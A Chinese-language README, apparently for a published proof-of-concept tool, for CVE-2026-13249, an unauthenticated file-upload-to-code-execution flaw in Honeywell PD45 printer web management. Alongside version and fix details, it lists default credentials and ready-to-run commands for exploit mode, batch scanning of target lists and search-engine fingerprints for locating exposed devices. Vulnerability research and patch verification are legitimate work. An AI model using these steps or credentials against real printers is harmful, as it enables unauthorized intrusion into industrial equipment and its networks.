针对 CVE-2026-13249 的 Python 3 PoC —— Honeywell PD45 工业打印机 Web 管理界面。
CVE-2026-13249 —— 固件 F10.19.010040 至 F10.22.030745 之前 在打印机 HTTPS Web 管理 界面暴露了 未认证任意文件上传 漏洞(CWE-306、CWE-434、CWE-78)。攻击者可上传攻击者控制的文件,这些文件可能 作为命令执行 于设备上(RCE)。CVSS 9.8 严重(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)。修复: 升级至 F10.22.030745 或更新版本;将 Web UI 限制在受信任的管理网络内。
PoC 页面: https://pocbit.org/pocs/cve-2026-13249
厂商: Honeywell 产品安全公告
| 产品 | Honeywell PD45 工业打印机 |
| 受影响固件 | ≥ F10.19.010040 且 < F10.22.030745 |
| 修复固件 | F10.22.030745 |
| 接口 | Web 管理(HTTPS,认证 流程的默认凭据记录为 itadmin / pass) |
| 影响 | 未认证上传 → RCE |
Honeywell 的公开公告未发布确切的未认证上传 URI。此 PoC 对设备和固件进行 指纹识别,可选地 抓取 /Manage/ 和 /Services/ 下的 multipart 表单,并支持从您在实验设备上自行捕获的 --upload-url。
pip install -r requirements.txt
python poc.py -u https://10.10.10.50 --mode check
python poc.py -u https://10.10.10.50 --mode check --upload-probe
python poc.py -u https://10.10.10.50 --mode exploit \
--upload-url "https://10.10.10.50/..." --field file \
--verify-url "https://10.10.10.50/pocbit_13249.txt"
python poc.py --list targets.example.txt --mode check -j 8
title="Honeywell" && body="PD45"
ssl.cert.subject.cn="PD45"
在您拥有或获得明确评估许可的打印机上进行授权测试。--upload-probe / --mode exploit 会向目标设备写入数据。